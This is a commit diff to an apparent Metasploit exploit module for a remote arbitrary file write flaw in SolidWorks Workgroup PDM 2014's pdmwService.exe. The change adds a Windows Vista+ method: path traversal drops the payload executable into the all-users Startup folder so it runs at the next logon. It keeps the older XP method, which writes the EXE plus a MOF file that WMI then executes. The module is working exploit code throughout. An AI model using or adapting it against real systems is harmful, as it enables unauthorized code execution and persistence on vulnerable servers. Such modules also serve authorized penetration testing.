Write payload to startup for Vista+

Author: bcoles

…solidworks_workgroup_pdmwservice_wbem.rb …orks_workgroup_pdmwservice_file_write.rbmodules/exploits/windows/misc/solidworks_workgroup_pdmwservice_wbem.rb renamed to modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_wbem.rb renamed to modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb

@@ -18,16 +18,18 @@ def initialize(info = {})
       info,
       'Name'           => 'SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write',
       'Description'    => %q{
-        This module exploits an arbitrary file write vulnerability in SolidWorks
-        Workgroup PDM 2014 SP2 and prior.
+        This module exploits a remote arbitrary file write vulnerability in
+        SolidWorks Workgroup PDM 2014 SP2 and prior.
 
-        Code execution can be achieved by first uploading the payload to the remote
-        machine as an exe file, and then upload another mof file, which enables
-        WMI (Management Instrumentation service) to execute the uploaded payload.
-        Please note that this module currently only works for Windows before Vista.
+        For targets running Windows Vista or newer the payload is written to the
+        startup folder for all users and executed upon next user logon.
+
+        For targets before Windows Vista code execution can be achieved by first
+        uploading the payload as an exe file, and then upload another mof file,
+        which schedules WMI to execute the uploaded payload.
 
         This module has been tested successfully on SolidWorks Workgroup PDM
-        2011 SP0.
+        2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -46,15 +48,18 @@ def initialize(info = {})
       'Platform'       => 'win',
       'Targets'        =>
         [
-          # Tested on SolidWorks Workgroup PDM 2011 SP0 - Windows XP SP3 (EN)
-          ['SolidWorks Workgroup PDM <= 2014 SP2 on Windows (Before Vista)', {}]
+          # Tested on:
+          # - SolidWorks Workgroup PDM 2011 SP0 (Windows XP SP3 - EN)
+          # - SolidWorks Workgroup PDM 2011 SP0 (Windows 7 SP1 - EN)
+          ['Automatic', { 'auto' => true } ], # both
+          ['SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)', {}],
+          ['SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)', {}],
         ],
       'Privileged'     => true,
       'DisclosureDate' => 'Feb 22 2014',
       'DefaultTarget'  => 0))
 
     register_options([
-      OptString.new('WINDIR', [true, 'The Windows directory', 'WINDOWS']),
       OptInt.new('DEPTH', [true, 'Traversal depth', 10]),
       Opt::RPORT(30000)
     ], self.class)
@@ -85,7 +90,7 @@ def check
       vprint_status "#{peer} - Received reply (#{res.length} bytes)"
       Exploit::CheckCode::Detected
     else
-      vprint_error "#{peer} - Unexpected reply (#{res.length} bytes)"
+      vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
       Exploit::CheckCode::Safe
     end
   end
@@ -123,20 +128,22 @@ def upload(fname, data)
   # Exploit
   #
   def exploit
-    windir = datastore['WINDIR']
-    depth  = '..\\' * datastore['DEPTH']
-    # send exe
-    exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
+    depth    = '..\\' * datastore['DEPTH']
     exe      = generate_payload_exe
-    print_status("#{peer} - Sending EXE (#{exe.length} bytes)")
-    upload("#{depth}#{windir}\\system32\\#{exe_name}", exe)
-    # send mof
-    mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
-    mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
-    print_status("#{peer} - Sending MOF (#{mof.length} bytes)")
-    upload("#{depth}#{windir}\\system32\\wbem\\mof\\#{mof_name}", mof)
-    # clean up
+    exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
+    if target.name =~ /Automatic/ or target.name =~ /Vista/
+      print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)")
+      upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe)
+    end
+    if target.name =~ /Automatic/ or target.name =~ /XP/
+      print_status("#{peer} - Sending EXE (#{exe.length} bytes)")
+      upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe)
+      mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
+      mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
+      print_status("#{peer} - Sending MOF (#{mof.length} bytes)")
+      upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
+      register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
+    end
     register_file_for_cleanup("#{::File.basename(exe_name)}")
-    register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
   end
 end